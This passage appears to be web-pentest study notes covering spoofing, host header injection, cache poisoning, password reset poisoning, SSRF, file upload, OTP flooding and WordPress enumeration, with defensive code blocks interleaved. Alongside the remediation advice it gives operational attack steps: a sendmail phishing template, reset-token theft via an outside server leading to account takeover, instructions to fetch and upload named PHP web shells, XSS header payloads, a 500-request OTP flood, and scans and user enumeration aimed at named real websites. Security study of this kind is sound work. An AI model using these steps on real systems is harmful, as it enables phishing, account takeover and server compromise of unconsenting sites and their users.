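    except (KeyError, ValueError, TypeError, ArithmeticError):
        return 400, None, "malformed request"
    real_price = CATALOGUE.get(product_id)
    if real_price is None:
        return 404, None, "unknown product"
    if quantity < 1:
        return 400, None, "quantity must be positive"     # blocks the -500 and 0 tricks
    if not hmac.compare_digest(str(req.get("sig", "")), price_tag(product_id, str(real_price))):
        return 400, None, "price signature invalid"
    if claimed != real_price:
        return 400, None, "price mismatch"                 # tampering attempt: log it
    return 200, str(real_price * quantity), "ok"


if __name__ == "__main__":
    line = quote_line("123")
    print(checkout(make_body(**line, quantity=1)))
    print(checkout(make_body(**{**line, "price": "1", "quantity": 1})))
```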

Low hanging fruits: any vulnerability that is quite easy to find.

Broken Link Hijacking (BLH)

It is a security vulnerability where attackers take control of abandoned or broken links on a website
to redirect users to malicious content, phishing pages, or exploit search engine optimization (SEO).

This happens when a website links to an external resource (like an image, JavaScript file, or social
media profile) that is no longer available because the domain expired, the account was deleted, or
the resource was removed. Attackers can register the expired domain or recreate the deleted
account to gain control over the linked content.
Real life Example : Social Media Takeover – A company removes its Twitter, Instagram, or LinkedIn
profile, but its website still links to it. Attackers create a new account with the same username to
impersonate the brand.

How to Prevent Broken Link Hijacking:

Regularly audit external links – Use tools like Screaming Frog SEO Spider or Burp Suite to find
broken links.

Self-host critical resources – Avoid relying on third-party CDNs or external scripts.

Redirect deleted social media profiles – If a brand changes social handles, update the website
links.

Monitor expired domains – Use Google Search Console or site crawlers to check for outdated
links.

Use Content Security Policy (CSP) – Restrict the execution of external scripts using CSP headers.

Automatic tool: apt install npm

npm install broken-link-checker -g

broken-link-checker https://dishtv.in -ro

Missing SPF Record

A missing SPF (Sender Policy Framework) record means that a domain does not have an SPF DNS
record configured to specify which mail servers are allowed to send emails on behalf of the domain.
Without SPF, attackers can spoof emails, making them appear as if they were sent from a legitimate
domain.

SPF helps prevent email spoofing and phishing attacks by allowing email servers to verify if the email
is sent from an authorized mail server. If an SPF record is missing, anyone can forge emails
pretending to be from your domain.

How to Check if SPF is Missing?

You can check a domain’s SPF record using:

1. Online Tools:
https://mxtoolbox.com/SPF.aspx

https://dnschecker.org/spf-record.php

Kitterman.org/spf/validate.html

2. Command Line (Linux/macOS/Windows PowerShell)

nslookup -type=TXT example.com

3. Extract Email Addresses from the Target Website:

Scrape or manually find emails from contact pages, About Us, privacy policies, or blog posts.

Use Google Dorks to find emails:

site:example.com "email"

site:example.com "contact@"

4. Send a Spoofed Email Using a Fake SMTP Server:

The attacker uses an SMTP service (like sendmail or mailx) or online tools like GoPhish or open SMTP
relays.

Example using sendmail:

sendmail -t
From: [email protected]
To: [email protected]
Subject: Urgent Update

Please update your password immediately by clicking this link: http://fake-site.com

[ OR ]

emkei.cz, spoofbox.com

Since SPF is missing, the recipient’s email server does not verify the sender’s legitimacy, and the
email lands in the inbox.

5. Victim Thinks the Email is Legitimate

The victim believes the email is from the official domain and may click on phishing links or download
malware.

Risks of a Missing SPF Record

Email Spoofing – Attackers can send phishing emails pretending to be your company.

Poor Email Deliverability – Your emails might go to spam or be rejected.

Brand Damage – Customers and partners might receive fake emails from your domain.

Soft fail vs hard fail

1. SoftFail (~all)

Behavior: If an email is sent from an unauthorized server, the recipient’s mail server marks it as
suspicious but still delivers it (usually to Spam/Junk).

Reason to Use: If you're testing SPF settings or want to allow some unauthorized emails to pass for
monitoring.

Example SPF Record with SoftFail:

v=spf1 include:_spf.google.com ~all

Impact:

Email might still be delivered.

More vulnerable to email spoofing (attackers can impersonate your domain).

2. HardFail (-all)

Behavior: If an email is sent from an unauthorized server, the recipient’s mail server rejects it
outright (bounces back).

Reason to Use: If you want strict email security and prevent unauthorized senders from using your
domain.

Example SPF Record with HardFail:

v=spf1 include:_spf.google.com -all
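The soft fail / hard fail distinction above is easy to check programmatically once you have the domain's TXT records. The following is an added example (not part of these notes, not tied to any real domain): it finds the v=spf1 record among a set of TXT strings, reports the qualifier on the terminating `all` mechanism, and tests whether a sender IP is covered by an explicit ip4:/ip6: mechanism. The three record sets are constructed; include:/a/mx mechanisms are deliberately not expanded because that would require live DNS.

```python
import ipaddress
import re

# Constructed sample TXT record sets for three hypothetical zones (not real DNS data).
SAMPLE_TXT_RECORDS = {
    "no-spf.example": ["google-site-verification=abc123"],
    "softfail.example": ["v=spf1 include:_spf.google.com ip4:203.0.113.0/24 ~all"],
    "hardfail.example": ["v=spf1 ip4:203.0.113.10 ip6:2001:db8::/32 -all"],
}


def find_spf_record(txt_records):
    """Return the single v=spf1 record, or None if missing. RFC 7208 allows exactly one;
    two or more is a permerror, which receivers treat much like having none."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    return spf[0] if len(spf) == 1 else None


def all_qualifier(spf_record):
    """Qualifier of the terminating 'all' mechanism: '-', '~', '?', '+' or None if absent."""
    for term in spf_record.split()[1:]:
        m = re.fullmatch(r"([-~?+]?)all", term, re.IGNORECASE)
        if m:
            return m.group(1) or "+"
    return None  # no 'all' term: evaluation ends neutral, so no protection


def ip_literal_match(spf_record, sender_ip):
    """Return the qualifier of the first ip4:/ip6: mechanism covering sender_ip, else None."""
    ip = ipaddress.ip_address(sender_ip)
    for term in spf_record.split()[1:]:
        qualifier = "+"
        if term[0] in "-~?+":
            qualifier, term = term[0], term[1:]
        if term.lower().startswith(("ip4:", "ip6:")):
            network = ipaddress.ip_network(term.split(":", 1)[1], strict=False)
            if ip.version == network.version and ip in network:
                return qualifier
    return None


def assess_domain(domain, txt_records):
    """Classify spoofing exposure from the domain's TXT records."""
    spf = find_spf_record(txt_records)
    if spf is None:
        return {"domain": domain, "spf": None, "risk": "high",
                "reason": "no SPF record: any server can send as this domain"}
    q = all_qualifier(spf)
    if q == "-":
        return {"domain": domain, "spf": spf, "risk": "low",
                "reason": "hard fail (-all): unauthorized senders are rejected"}
    if q == "~":
        return {"domain": domain, "spf": spf, "risk": "medium",
                "reason": "soft fail (~all): spoofed mail is marked but still delivered"}
    return {"domain": domain, "spf": spf, "risk": "high",
            "reason": "'?all', '+all' or no 'all' term: unauthorized senders pass"}
```

To use it against a live domain, feed the output of `nslookup -type=TXT example.com` (one string per record) into `assess_domain`; a result of "medium" is the `~all` case described above, and "high" with `spf: None` is the missing-record case.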

Origin ip disclosure

Origin IP disclosure is a vulnerability where an attacker can obtain the real IP address of a web server,
even if it is protected behind CDN services (Cloudflare, Akamai, etc.), WAFs, or proxies.

Impact: port scanning and exploitation of exposed ports

Direct exploitation of web server vulnerabilities (bypassing the CDN/WAF)

DDoS against the origin, etc.

Shodan: hostname:dishtv.in

Censys: search by the domain name

Session Not Expiring After Password Change

Broken authentication & session management { title }

1. Log in to the same IGP.com account on two different browsers: Google Chrome and Brave.

Use Email or Phone Number along with the Password to log in.

2. In Brave, navigate to:

Account Settings > Profile Settings > My Profile > Change Password

3. Change the password and confirm the update.

4. Observe that Brave logs out automatically after the password update.

5. Switch to Chrome, which is still logged into the same account.

6. Attempt to access account settings, personal data, or make transactions.


Expected Behavior:

After a password change, all active sessions across different browsers should immediately expire,
requiring re-login.

Actual Behavior:

The session in Chrome remains active, even after a password change in Brave.

The user can still access personal data and perform actions without re-authentication.

Impact:

This is a security risk because if an attacker gains access to an active session, they can continue using
it even after a password reset.

Users expect all active sessions to be logged out when they update their password, preventing
unauthorized access.

Suggested Fix:

Invalidate all active sessions when a user updates their password.

Revoke authentication tokens and session cookies across all devices and browsers.

Implement session expiration policies for better security.


Long Password DoS Attack – Testing in Burp Suite (During Account Creation)

If a website does not properly limit password length during account creation, an attacker can send
extremely long passwords to overload the server. Here’s how you can test it using Burp Suite.

🛠 Steps to Perform Long Password DoS Attack Using Burp Suite

Intercept the Account Creation Request

1. Open Burp Suite and enable Intercept On in the Proxy tab.

2. Go to the target website’s Sign-Up / Register page and enter normal details.

3. Enter any password (e.g., 12345678) and click Sign Up.

4. In Burp Suite, intercept the request.

5. Look for the password parameter:

POST /register HTTP/1.1

Host: example.com

Content-Type: application/x-www-form-urlencoded

username=testuser&[email protected]&password=12345678

6. Replace the password with a very long string (1 million+ characters). Manually paste a long password:

password=123456781234567812345678 ... (repeat until the value is about 1 million characters long)

Observe the Server Response

If the website is secure:

It should return an error like:

400 Bad Request: Password Too Long

Response time should stay normal (~<1 sec).

How to Fix This Vulnerability?

Set a maximum password length (e.g., 128 characters) server-side.

Reject unusually large requests before processing.

Implement rate-limiting to prevent repeated abuse.

Use a strong hashing algorithm (e.g., bcrypt, Argon2) with safe limits.
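The four fixes above come down to one ordering rule: bound the input before any expensive work is done on it. The following is an added example (not from these notes) of a registration handler that enforces a body-size limit before parsing and a password-length limit before hashing. It uses the standard library's PBKDF2 as a stand-in for bcrypt/Argon2, since the point is where the check sits, not which slow hash is used; the 4096-byte body limit and the 8/128 character bounds are assumptions.

```python
import hashlib
import os
import urllib.parse

MIN_PASSWORD_LENGTH = 8
MAX_PASSWORD_LENGTH = 128          # checked before any hashing work (assumed policy value)
MAX_REGISTER_BODY_BYTES = 4096     # a registration form never needs more than this (assumption)


def hash_password(password, salt=None):
    """Slow hash; stdlib stand-in for bcrypt/Argon2. This cost is what a long-password DoS targets."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000, dklen=32)
    return salt + digest


def validate_password_length(password):
    """Return an error string or None. O(len) and no hashing, so cheap to run on junk input."""
    if len(password) < MIN_PASSWORD_LENGTH:
        return "Password Too Short"
    if len(password) > MAX_PASSWORD_LENGTH:
        return "Password Too Long"
    return None


def handle_register(body):
    """body: raw form bytes of a POST /register. Returns (status, message, stored_hash)."""
    # 1. Reject oversized requests before even parsing them (in practice the web server or
    #    framework should do this via a request-size limit; this mirrors that check).
    if len(body) > MAX_REGISTER_BODY_BYTES:
        return 413, "Payload Too Large", None
    fields = dict(urllib.parse.parse_qsl(body.decode("utf-8", "replace")))
    password = fields.get("password", "")
    # 2. Bound the password length before the slow hash runs.
    err = validate_password_length(password)
    if err:
        return 400, err, None
    # 3. Only now pay for the expensive hash.
    return 200, "OK", hash_password(password)


# Constructed sample request bodies (the first mirrors the intercepted request above).
NORMAL_BODY = b"username=testuser&email=test%40example.com&password=12345678"
HUGE_BODY = b"username=testuser&password=" + b"12345678" * 125_000   # 1,000,000-char password
```

With this ordering, the million-character request is rejected by the size check in constant time and never reaches `hash_password`; a 200-character password that fits the body limit is still rejected before hashing.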

If the website is vulnerable, possible signs are:

1. Delayed or No Response (Server Overload)

Sign: The response takes a long time (5-10+ seconds) or never comes back.

2. Internal Server Error (Crash)

Sign: The server crashes due to excessive CPU/memory usage.


Possible Response:

HTTP/1.1 500 Internal Server Error

Content-Type: text/html

3. Memory Exhaustion Error

Sign: The server runs out of memory and stops processing.

Possible Response:

Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 8388608 bytes)

4. Website Becomes Unresponsive for Other Users

The entire website slows down or becomes inaccessible because the attack consumes server
resources.

Other users might see "Service Unavailable" (HTTP 503) errors.

Price Tampering

Price tampering refers to the deliberate alteration or manipulation of prices, typically to deceive
customers or gain an unfair advantage. This can happen in various contexts, such as retail, e-
commerce, or services. The goal of price tampering is usually to make products or services appear
cheaper than they are, or more expensive than they should be, in order to mislead or exploit
consumers.

The price can be tampered with at any point in the flow, for example from adding the product to the cart
up to the moment the final payment gateway request is generated.

Alternatively, change it only at the final payment gateway generation step.

On some websites the price is not shown in the request parameters at all.

Values to try: 0, -100, 100-100, 1

Change the request method in Burp Suite {bypass}


Impact of Price Tampering Vulnerabilities

Loss of Revenue

Impact: If attackers manipulate prices (for example, lowering prices artificially), they can cause
businesses to lose money. Customers may end up paying far less than intended, leading to financial
losses for the business.

Remediations for Price Tampering Vulnerabilities

Server-Side Price Validation

Remediation: Ensure that the final price is validated on the server-side, not just on the client-side
(user’s browser). Never rely on the data shown on the user’s browser to determine the final price
because it can be easily manipulated.

How to Implement: Use secure APIs to retrieve and display prices, and ensure that the server
performs checks on the price before processing payment.

Secure Payment Systems


Remediation: Implement secure and trusted payment gateways. Ensure that the payment gateway
does not allow for price manipulation or changes during the transaction.

How to Implement: Use HTTPS for secure transactions and use trusted third-party payment services
like PayPal, Stripe, or others to process payments securely.

Real-Time Price Transparency

Remediation: Display a clear breakdown of all charges (including taxes, shipping, and discounts)
throughout the shopping process, not just at checkout. This ensures the customer is aware of the full
price at all times.

How to Implement: Update the cart with real-time price changes whenever a new coupon is applied,
or shipping options are selected, ensuring the customer is always aware of the price changes.

Implement Strong Authentication & Authorization

Remediation: Protect admin interfaces and backend systems with strong authentication to ensure
only authorized personnel can modify pricing. This prevents unauthorized access and tampering by
insiders or hackers.

How to Implement: Use two-factor authentication (2FA) for administrators, role-based access control
(RBAC), and regular audits of your backend systems to detect any unusual changes.

Use of Secure APIs for Pricing Information

Remediation: Ensure that all price data is transferred securely and cannot be intercepted or
manipulated by attackers. This includes using encrypted connections and securing any public APIs.

How to Implement: Ensure all API endpoints involving pricing data use SSL/TLS encryption and
employ methods like API keys or OAuth for secure access.

Auditing and Logging


Remediation: Regularly audit and log all pricing changes to identify any unauthorized changes or
tampering attempts.

How to Implement: Set up logging mechanisms to track all price modifications. Review logs for
unusual activity regularly and trigger alerts for suspicious changes to pricing.

Penetration Testing and Vulnerability Scanning

Remediation: Conduct regular penetration testing and vulnerability scanning to identify and fix any
weaknesses in the system that could lead to price tampering.

How to Implement: Hire cybersecurity experts or use automated vulnerability scanning tools to test
your website’s security and ensure there are no exploitable flaws.

User Education

Remediation: Educate your customers about the legitimacy of prices and discounts on your site. This
can help reduce the impact of price tampering if customers are aware of what to expect.

How to Implement: Clearly communicate your pricing policies, discounts, and any terms and
conditions around pricing on your website to foster customer trust.

Host Header Injection


It is a type of security vulnerability in web applications where an attacker manipulates the Host
header in an HTTP request to send arbitrary data to the server. The Host header indicates which
domain the client is requesting, and most web servers use it to determine the correct resource to
serve.

Host Header injection can lead to:

Open redirection vulnerability

Web cache poisoning attack

Password reset poisoning attack

XSS attack

SSRF

Variants to try (each added directly below the Host field):

X-Forwarded-Host: bing.com

Host: bing.com
X-Forwarded-Host: original domain name

Host: original domain name
Referer: bing.com

Host: bing.com
Referer: bing.com

Web Cache Poisoning

It is a type of attack in which an attacker manipulates the web cache (either on the server or in
intermediate caching layers such as reverse proxies or CDNs) to serve malicious or unintended
content to users. This happens when the cache stores content that is intended to be unique for
certain users but is instead incorrectly cached and later served to others. Essentially, the attacker
poisons the cache with a malicious response, which can then be served to other users accessing the
same resource.

The general flow of caching works like this:

Client makes a request: The client (e.g., a browser) sends a request to the web server (e.g.,
requesting a webpage or API data).

Server processes the request: The server processes the request and generates a response. This
response could either be dynamic (based on user input, session, etc.) or static (e.g., an image,
stylesheet, etc.).

Cache storage: Once the server has processed the request and sent the response, the response is
stored in a cache (either on the server itself or in an intermediate caching layer like a Content
Delivery Network (CDN) or a reverse proxy). Caching is done to avoid reprocessing the same request
over and over again, which can improve performance and reduce the load on the server.

Next request: If the client or another user makes the same request again (or a request that matches
the cached content), the cache (not the server) provides the stored response instead of the server
reprocessing the request. This is faster because the cache can quickly return the response without
the need for the server to generate it again.

Miss vs hit

1. Cache Miss:

A cache miss occurs when the requested data is not found in the cache. When a cache miss
happens, the system needs to go to the original data source (such as the web server, database, or
external API) to retrieve the content, and then it will store this content in the cache for future use.

Example:
Step 1: A user visits a website that hasn't been previously visited by anyone, so the requested
resource isn't in the cache.

Step 2: The server processes the request, generates the response, stores it in the cache, and sends it
back to the user.

Result: The server response is stored in the cache for future requests.

In subsequent visits, the response could be served from the cache (if it's a cache hit), reducing load
on the server.

2. Cache Hit:

A cache hit occurs when the requested data is found in the cache. In this case, the cache stores the
response for a specific request (like a web page or image), and the system returns the cached
content directly to the client without needing to retrieve it from the original source (such as the web
server).

Example:

Step 1: A user visits a website, and the response is stored in the cache.

Step 2: The same user (or someone else) visits the same website again.

Result: The cached response is served directly from the cache because it hasn't changed or expired.
This saves time and resources by avoiding redundant processing on the server.

Fresh Request to the Server:

To force a fresh (uncached) response, add a cache-buster parameter such as ?dc=1234 to the URL.

First, check if the application is vulnerable to Host header injection; if vulnerable, inject an XSS
payload by adding the Host or X-Forwarded-Host headers and check the response for successful
injection. If the XSS payload is injected, and the response is cached, any subsequent visitor to the
website will automatically see the XSS alert due to the cached malicious content.

HOST: <script>alert('1')</script>

X-Forwarded-Host: <script>alert('1')</script>
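The miss/hit flow above is what makes the header injection persistent: the cache key is usually just the path, while the origin's response depends on a header the key ignores. The following added example (a toy cache, not from these notes or any real proxy) reproduces that and shows the two defences. Keying the cache on the header stops one attacker's response reaching other users; validating Host against an allowlist and escaping it removes the injection itself. The hostname and page markup are constructed.

```python
# Minimal model of a reverse-proxy cache to show unkeyed-header poisoning and its fixes.
class ToyCache:
    def __init__(self, key_headers=()):
        self.key_headers = tuple(h.lower() for h in key_headers)
        self.store = {}
        self.hits = self.misses = 0

    def cache_key(self, request):
        # Path only unless the operator adds headers to the key (the 'Vary' idea).
        extra = tuple(request["headers"].get(h, "") for h in self.key_headers)
        return (request["path"],) + extra

    def fetch(self, request, origin):
        key = self.cache_key(request)
        if key in self.store:              # cache hit: origin is not consulted at all
            self.hits += 1
            return self.store[key]
        self.misses += 1                   # cache miss: ask origin, then store for everyone
        response = origin(request)
        self.store[key] = response
        return response


def origin_app(request):
    """Vulnerable origin: reflects X-Forwarded-Host (or Host) into the page unescaped."""
    host = request["headers"].get("x-forwarded-host") or request["headers"].get("host", "")
    return f'<link rel="canonical" href="https://{host}/">'


def html_escape_attr(value):
    return (value.replace("&", "&amp;").replace("<", "&lt;")
                 .replace(">", "&gt;").replace('"', "&quot;"))


def hardened_origin(request, allowed_hosts=("www.example.com",)):
    """Fixed origin: ignores X-Forwarded-Host, allowlists Host, escapes on output."""
    host = request["headers"].get("host", "")
    if host not in allowed_hosts:
        return "400 Bad Request"
    return f'<link rel="canonical" href="https://{html_escape_attr(host)}/">'


def make_request(path, host, xfh=None):
    headers = {"host": host}
    if xfh is not None:
        headers["x-forwarded-host"] = xfh
    return {"path": path, "headers": headers}


def demo_poisoning(origin, key_headers=()):
    """What a normal visitor receives after an attacker's request populated the cache."""
    cache = ToyCache(key_headers)
    attacker = make_request("/", "www.example.com", xfh='"><script>alert(1)</script>')
    cache.fetch(attacker, origin)                              # miss: poisoned entry stored
    victim = make_request("/", "www.example.com")              # same path, no custom header
    return cache.fetch(victim, origin)
```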

Password reset poisoning

Password reset poisoning refers to a type of attack where an attacker manipulates or exploits the
password reset process to gain unauthorized access to a user's account. This can be done by
intercepting or altering the reset request, often by changing the email address or reset token, so the
attacker can reset the password and take control of the account.
• Password reset link generation with attacker account: A password reset link is generated with the
attacker's account, and the reset email will be received by the attacker.

• Check for host header injection vulnerability: Check if the system is vulnerable to host header
injection by adding the 'Host' or 'X-Host' field. If successful, the attacker will receive the password
reset email with a malicious URL containing {bing.com } and the token ID, indicating the vulnerability.

• Generate password reset link with attacker email: Regenerate the password reset link with the
attacker’s email or username. Modify the request to add 'Host' or 'X-Forwarded-Host' with the server
URL and change the attacker’s email ID to the victim's email or username.

You can also use the Burp Collaborator client URL as the server URL.

• Monitor access log of the exploited server: Monitor the access log of the exploited server.

• Capture victim's token ID: In the server access logs, you will find the victim’s token ID. Copy that
token ID.

• Access the reset link: At first, the attacker’s account password reset link will appear. Copy that link,
paste it into the browser, and change the token to the victim’s token ID.

• Victim password setup: When you visit the modified link, the victim’s account will show the new
password setup page, allowing the attacker to set a new password for the victim's account.

SSRF

SSRF stands for Server-Side Request Forgery. It’s a type of web security vulnerability where an
attacker tricks a server into making HTTP requests to arbitrary domains or IP addresses, including
internal systems not directly accessible from the internet.

Types:

1. Regular

2. Blind

Parameters: dest, php_info, callback, id, file, page, url, uri, path, root, site, referrer, continue,
window, reference, redirect, data, html

Inject a Pipedream.com (request-catcher) endpoint URL into the parameter, e.g. id=<your pipedream endpoint URL>, and replay the request from Burp Suite.

Payloads :

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20
Forgery/README.md

http://localhost:80
http://localhost:22

https://localhost:443
http://127.0.0.1:80

http://127.0.0.1:22

https://127.0.0.1:443
http://0.0.0.0:80

http://0.0.0.0:22

https://0.0.0.0:443
http://[::]:80/
http://[0000::1]:80/
In Burp Suite: Proxy > send to Intruder > payload type Numbers, range 1-1024, to iterate over the port in the URL.

https://h.43z.one/ipconverter/

File upload

A file upload vulnerability occurs when a web application does not properly validate or sanitize files
uploaded by users. This can allow attackers to upload malicious files, such as web shells, scripts, or
executables, which can then be used to compromise the system.
How the server validates uploads:

1. File Name Validation

2. Extension Validation

3. Content Type

4. Content Inspection

5. File Size Validation
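Here is an added example (not from these notes) of an upload handler that applies all five checks in the list above, in the order a defender would want them: size first, then the file name, the final extension against an allowlist, the declared content type, and the content itself via magic bytes. The allowlist, size limit and sample bytes are constructed; the `<?php` scan is only a heuristic against polyglot images and is labelled as such in the code.

```python
import os
import re
import secrets

MAX_UPLOAD_BYTES = 2 * 1024 * 1024   # assumed limit
# Constructed allowlist: extension -> (expected Content-Type, accepted magic-byte prefixes).
ALLOWED = {
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
}


class UploadRejected(ValueError):
    pass


def validate_upload(filename, content_type, data):
    """Run the five checks from the list above; return the name to store the file under."""
    # 5. File size first: nothing else is worth doing on something we will not keep
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    # 1. File name: strip any directory part, allow a plain name, no dotfiles (.htaccess)
    base = os.path.basename(filename.replace("\\", "/"))
    if base.startswith(".") or not re.fullmatch(r"[A-Za-z0-9_.-]{1,100}", base):
        raise UploadRejected("bad file name")
    # 2. Extension: only the final extension counts and it must be allowlisted, so .php, .php5,
    #    .phtml are rejected here and shell.php.png (last ext png) falls through to the content check
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    expected_type, magics = ALLOWED[ext]
    # 3. Content type: client-controlled, so it may only confirm, never replace, the other checks
    if content_type.split(";")[0].strip().lower() != expected_type:
        raise UploadRejected("content type mismatch")
    # 4. Content inspection: magic bytes must match the extension; a renamed script fails here.
    #    The '<?php' scan is a heuristic against polyglot images (assumption, not a complete check).
    if not any(data.startswith(m) for m in magics):
        raise UploadRejected("content does not match extension")
    if b"<?php" in data:
        raise UploadRejected("embedded script marker")
    # Store under a random name with the validated extension; never reuse the user's name on disk
    return f"{secrets.token_hex(16)}.{ext}"


def check_upload(filename, content_type, data):
    """Non-raising wrapper: (True, stored_name) or (False, reason)."""
    try:
        return True, validate_upload(filename, content_type, data)
    except UploadRejected as exc:
        return False, str(exc)


# Constructed sample inputs
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_BYTES = b"<?php echo 'shell'; ?>"
```

The stored file should additionally live outside the web root, or in a location served with script execution disabled, so that even a check that is later bypassed does not yield code execution.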

Just search on Google for web shells. For example, search 'AK47 web shell'. You can also explore
others like b374k shell, WSO shell, R57, C99, and China Chopper.

Download a .php web shell file and upload it to a website wherever there’s a file upload functionality

https://github.com/BlackArch/webshells/blob/master/php/AK-
74%20Security%20Team%20Web%20Shell%20Beta%20Version.phpcsrf

Bypass Methods:

git clone https://github.com/almandin/fuxploider

cd fuxploider

pip3 install -r requirements.txt

python3 fuxploider.py -u http://192.168.29.86/owaspbricks/upload-1 --not-regex "wrong file type"

Alternative extensions to try: .php1, .php2, .php3, .php4, .php5

No rate limit vulnerability

Sending an excessive number of phone OTPs without restriction

Sending unlimited email OTPs

Repeated sending of WhatsApp OTPs

Sending multiple password reset links without rate limiting

Abusing resend OTP functionality

Triggering verification messages repeatedly

Spamming user invitation or referral links

Unrestricted API requests to OTP or reset endpoint

Step-by-Step: Intercept OTP or Token Request

Open Burp Suite and set up your browser to use Burp’s proxy (127.0.0.1:8080).

Go to the target site and perform an action that sends an OTP (e.g., enter your phone/email).

In Proxy > HTTP history, find the POST or GET request responsible for OTP delivery.

Look for endpoints like: /send-otp, /request-otp, /generate-otp, etc.

It often contains parameters like phone, email, or channel=whatsapp.


1. Send the Request to Intruder

In HTTP history, right-click on the OTP request.

Select “Send to Intruder”.

2. Send the Request to Sequencer

If the request or response contains an OTP code or session token (like a cookie or verification
code), you can analyze its randomness.

Right-click the request in HTTP history → Select “Send to Sequencer”.

Step-by-Step Instructions

1. Intruder → Positions Tab

Click Clear to remove automatic payload markers

Manually highlight the parameter to inject payloads into:

Could be a header such as Content-Length or Expires, the q-value in Accept-Language (the 0.5 in "en;q=0.5"), or part of the body { e.g. a field whose value is 5 }

(Optional) You can also highlight a header like Accept-Language to vary it as a bypass technique

2. Intruder → Payloads Tab

Payload Type: Numbers

From: 1

To: 500

Step: 1

This will send 500 requests, simulating repeated OTP requests.

3. Start Attack

Click Start Attack

Monitor the responses:

Status Code: 200 OK consistently

Content Length remains same (e.g., "OTP sent")

No error or blocking message


No increasing delay

Signs of No Rate Limiting

OTP is sent every time without restriction

No CAPTCHA or blocking after multiple requests

Status and response body remain unchanged

No cooldown timer or IP lock

Through the Sequencer tab:

Go to the Sequencer tab.

Select the correct token location (Burp may auto-detect a session cookie or OTP in the response).

Click Start live capture.
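The Intruder run above is looking for the absence of exactly one server-side component: a limiter on the OTP endpoint. The following is an added example (not from these notes) of such a limiter: a sliding-window count per destination (phone/email) and per client IP, plus a resend cooldown, with an injectable clock so the 500-request burst can be replayed offline. `simulate` reproduces the Intruder pattern against it. The limits, the phone number and the IP are constructed.

```python
import time
from collections import deque


class OtpRateLimiter:
    """Sliding-window limits per destination and per client IP, plus a resend cooldown.
    Limits are assumptions; tune them to the product's real resend needs."""

    def __init__(self, per_dest=5, per_ip=20, window_s=3600, cooldown_s=60, clock=time.monotonic):
        self.per_dest, self.per_ip = per_dest, per_ip
        self.window_s, self.cooldown_s = window_s, cooldown_s
        self.clock = clock
        self.dest_hits = {}   # destination -> deque of send timestamps inside the window
        self.ip_hits = {}     # client ip   -> deque of send timestamps inside the window

    def _prune(self, dq, now):
        while dq and now - dq[0] >= self.window_s:
            dq.popleft()

    def allow(self, destination, client_ip):
        """Return (allowed, reason). Only a successful call counts against the limits."""
        now = self.clock()
        d = self.dest_hits.setdefault(destination, deque())
        i = self.ip_hits.setdefault(client_ip, deque())
        self._prune(d, now)
        self._prune(i, now)
        if d and now - d[-1] < self.cooldown_s:
            return False, "cooldown"            # the 'resend' button abuse case
        if len(d) >= self.per_dest:
            return False, "destination limit"   # one victim flooded from many IPs
        if len(i) >= self.per_ip:
            return False, "ip limit"            # one client hitting many destinations
        d.append(now)
        i.append(now)
        return True, "sent"


class FakeClock:
    """Deterministic clock for tests and demos."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def simulate(n_requests, phone="+910000000000", ip="198.51.100.7", gap_s=0):
    """Constructed Intruder-style burst: n requests to /send-otp with a fixed gap between them.
    Returns the reason string for each request."""
    clock = FakeClock()
    limiter = OtpRateLimiter(clock=clock)
    results = []
    for _ in range(n_requests):
        results.append(limiter.allow(phone, ip)[1])
        clock.advance(gap_s)
    return results
```

Against this limiter the Intruder run from the steps above produces one "sent" followed by 499 rejections, and spacing requests 60 seconds apart still stops after the fifth send in the hour. The store here is in-process; a real deployment keeps the same counters in a shared store such as Redis so that every application instance sees them.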


WordPress { CMS }

WPScan is a command-line tool used by security professionals and developers to identify known
security issues in WordPress core, themes, and plugins. It uses a vulnerability database maintained
by the WPScan team.

Enumerate all :

wpscan --url https://yourwebsite.com -e ap --api-token YOUR_TOKEN

wpscan --url https://yourwebsite.com -e at --api-token YOUR_TOKEN

vulnerable only :

wpscan --url https://yourwebsite.com -e vp --api-token YOUR_TOKEN

wpscan --url https://yourwebsite.com -e vt --api-token YOUR_TOKEN

https://wpscan.com/ { Register and get api token }

Using --random-user-agent can help bypass basic firewalls or bot detection, but it has limited
effectiveness against advanced Web Application Firewalls (WAFs)

What is xmlrpc.php?

xmlrpc.php is a file in WordPress that enables remote communication between your WordPress site
and external applications using the XML-RPC protocol. This allows programs (like mobile apps or
other websites) to interact with your WordPress site remotely.

What Does It Do?

XML-RPC allows external systems to send commands to WordPress using XML-formatted requests
over HTTP. These commands can:

Create, edit, or delete posts

Upload media

Manage comments

Get recent posts or comments

Manage categories and tags

Perform user authentication

Use remote publishing tools like the WordPress mobile app, Jetpack, or MarsEdit

Example Use Case:

You’re using the official WordPress mobile app. It needs to connect to your site to publish a blog
post. It uses xmlrpc.php to do that.

Attacks:

1. Brute force WordPress logins

2. DoS

3. List users

inurl:"/xmlrpc.php?rsd"

intitle:"WordPress" inurl:"readme.html"

allinurl:"wp-content/plugins/"

Enumerate users :
https://www.thefreecat.org/wp-json/wp/v2/users

wpscan --url https://yourwebsite.com -e u

https://thefreecat.org/wp-sitemap-users-1.xml

Open the target's xmlrpc.php link in your browser and intercept the request using Burp Suite.
Once intercepted, send that request to the Repeater tab.

In the Repeater, right-click the request and select "Change request method" so the GET request
becomes a POST, then send it. You should see a 200 OK status in the response.

Now append the following XML body to the request; the response will list all available methods:

https://github.com/rm-onata/xmlrpc-attack

<?xml version="1.0" encoding="utf-8"?>

<methodCall>

<methodName>system.listMethods</methodName>

<params></params>

</methodCall>

Checking whether the server responds:

<?xml version="1.0" encoding="utf-8"?>

<methodCall>

<methodName>demo.sayHello</methodName>

<params></params>

</methodCall>

This call is used to determine whether the xmlrpc.php file is enabled or not.

In the server’s response, you should see the message "hello".


XML-RPC pingback attacks:

